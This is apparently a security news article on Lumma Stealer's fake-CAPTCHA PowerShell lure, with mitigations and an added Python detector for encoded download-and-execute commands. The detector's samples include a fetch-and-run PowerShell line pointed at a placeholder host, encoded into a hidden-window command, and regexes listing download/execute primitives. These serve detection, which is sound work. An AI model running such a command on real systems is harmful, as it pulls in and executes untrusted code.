Lumma Stealer was first detected by Unit42 at Palo Alto Networks, but recent findings by CloudSEK indicate a wider distribution network than initially thought. The attackers have created a series of fraudulent websites featuring a fake human verification system that mimics Google's CAPTCHA. Unlike genuine CAPTCHA pages, which require simple actions such as checking a box, these fake pages prompt users to run unusual commands.

## How Lumma Stealer is Spread
In one reported case, the verification page directed users to execute a PowerShell script. This script contained commands that fetched content from a remote server, downloading a file that ultimately infected the Windows system with Lumma Stealer.
## Identified Malicious URLs

Researchers have identified several URLs actively distributing Lumma Stealer; the fake verification pages are served from commercial CDN, static-hosting and cloud storage services as well as attacker-registered domains.
## Techniques Used by Attackers

Attackers are leveraging content delivery networks (CDNs) to host these fake verification pages, and use base64 encoding and clipboard manipulation to evade detection. While no other malware has been reported using this method yet, the possibility of such expansion exists.
## Mitigating the Threat of Lumma Stealer

As this attack relies on phishing techniques, traditional security patches won't necessarily prevent infection. However, there are several steps organizations and users can take to protect against Lumma Stealer:
- Awareness and Training: Educate users and employees about the risks of this phishing tactic and the dangers of executing commands from unverified sources.
- Endpoint Protection: Implement and maintain reliable endpoint protection solutions capable of detecting and blocking PowerShell-based attacks.
- System Updates: Regularly update and patch systems to minimize vulnerabilities that Lumma Stealer could exploit.
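Detection logic for the technique described above (a user-launched PowerShell with a base64-encoded command that fetches and runs remote content), as an added example that is not part of the original article or of any vendor's product. It scores constructed process-creation events in a hypothetical `Key=Value|Key=Value` log format; the host `placeholder.invalid` and the build-agent path are placeholders.

```python
import base64
import re

# Download-and-execute primitives that a real verification page would never
# ask a user to paste into a terminal.
DOWNLOAD_EXEC = re.compile(
    r"(invoke-webrequest|\biwr\b|invoke-restmethod|\birm\b|downloadstring|"
    r"invoke-expression|\biex\b|\bmshta\b)", re.I)
ENC_FLAG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
HIDDEN = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)

def decode_encoded_command(cmdline):
    """Return the -EncodedCommand payload decoded as UTF-16LE, or None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def analyze_event(line):
    """Score one 'Key=Value|Key=Value' process-creation line (constructed
    format). Returns (score, reasons); a score of 3 or more is worth alerting on."""
    fields = dict(part.split("=", 1) for part in line.split("|"))
    parent, cmdline = fields.get("ParentImage", "").lower(), fields.get("CommandLine", "")
    reasons = []
    if parent.endswith("\\explorer.exe"):
        reasons.append("powershell launched from explorer.exe (Run dialog)")
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        reasons.append("base64-encoded command")
    if HIDDEN.search(cmdline):
        reasons.append("hidden window")
    hits = sorted({h.lower() for h in DOWNLOAD_EXEC.findall(decoded or cmdline)})
    if hits:
        reasons.append("download/execute primitives: " + ", ".join(hits))
    return len(reasons), reasons

# Constructed sample events: the first mirrors the fake-CAPTCHA chain (fetch
# text from a placeholder host and evaluate it), the second is routine automation.
SAMPLE_PASTED = "Invoke-WebRequest -Uri http://placeholder.invalid/verify | Invoke-Expression"
SAMPLE_ENC = base64.b64encode(SAMPLE_PASTED.encode("utf-16-le")).decode()
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
SAMPLE_LOG = [
    f"ParentImage=C:\\Windows\\explorer.exe|Image={PS}|CommandLine=powershell -w hidden -enc {SAMPLE_ENC}",
    f"ParentImage=C:\\Tools\\build-agent.exe|Image={PS}|CommandLine=powershell -NoProfile -File C:\\build\\deploy.ps1",
]
```

Feed real Sysmon Event ID 1 or Security 4688 fields into `analyze_event` after mapping them to the same keys; the first sample scores 4, the second 0.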
## Conclusion

Lumma Stealer presents a sophisticated phishing threat by tricking users into executing commands that lead to infection. With its ability to bypass traditional security measures through social engineering, it emphasizes the need for awareness and proactive defense strategies. Organizations should ensure robust endpoint protection and train users to recognize and avoid these deceptive tactics.